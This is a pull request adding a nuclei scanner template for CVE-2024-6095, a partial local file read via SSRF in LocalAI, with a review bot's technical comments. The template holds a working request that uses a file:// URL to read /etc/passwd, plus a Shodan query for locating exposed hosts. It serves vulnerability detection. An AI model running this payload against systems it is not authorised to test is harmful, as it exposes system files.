Merge pull request #10593 from projectdiscovery/CVE-2024-6095
Create CVE-2024-6095.yaml
Showing 1 changed file with 67 additions and 0 deletions.
@@ -0,0 +1,67 @@ | ||
id: CVE-2024-6095 | ||
|
||
info: | ||
name: LocalAI - Partial Local File Read | ||
author: iamnoooob,pdresearch,rootxharsh | ||
severity: medium | ||
description: | | ||
A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s)-// and file-// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17. | ||
reference: | ||
- https://github.com/fkie-cad/nvd-json-data-feeds | ||
- https://github.com/sev-hack/sev-hack | ||
- https://nvd.nist.gov/vuln/detail/CVE-2024-6095 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N | ||
cvss-score: 5.8 | ||
cve-id: CVE-2024-6095 | ||
cwe-id: CWE-918 | ||
epss-score: 0.00046 | ||
epss-percentile: 0.17714 | ||
cpe: cpe:2.3:a:mudler:localai:*:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 2 | ||
vendor: mudler | ||
product: localai | ||
shodan-query: http.favicon.hash:-976853304 | ||
tags: cve,cve2024,localai,mudler,lfi | ||
|
||
flow: http(1) && http(2) | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /models/apply HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/json | ||
{"url":"file:///etc/passwd"} | ||
extractors: | ||
- type: json | ||
part: body | ||
name: uuid | ||
internal: true | ||
json: | ||
- ".uuid" | ||
|
||
- raw: | ||
- | | ||
GET /models/jobs/{{uuid}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- ': cannot unmarshal !!str `root:x:...`' | ||
|
||
- type: word | ||
part: content_type | ||
words: | ||
- 'application/json' | ||
|
||
- type: status | ||
status: | ||
- 200 |
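Review bot: The first raw request (the `POST /models/apply` block) shows `Content-Type: application/json` immediately followed by `{"url":"file:///etc/passwd"}` with no blank line between the headers and the body; nuclei raw requests need that empty line, otherwise the JSON is sent as a malformed header and the server never sees the payload. If the blank line was only lost in rendering, fine; if not, insert it. Second, the apply endpoint returns a job `uuid` that is then fetched from `/models/jobs/{{uuid}}`, which indicates the download is processed asynchronously; the second request fires straight after the first, so the `cannot unmarshal !!str` error may not be recorded yet and the template can produce false negatives. Worth a comment in the template, or a note that the job endpoint may need to be re-queried. Third, `cwe-id: CWE-918` and the description both identify the root cause as SSRF, but `tags` lists only `lfi`; adding `ssrf` to the tag list would make the template discoverable for that class of issue.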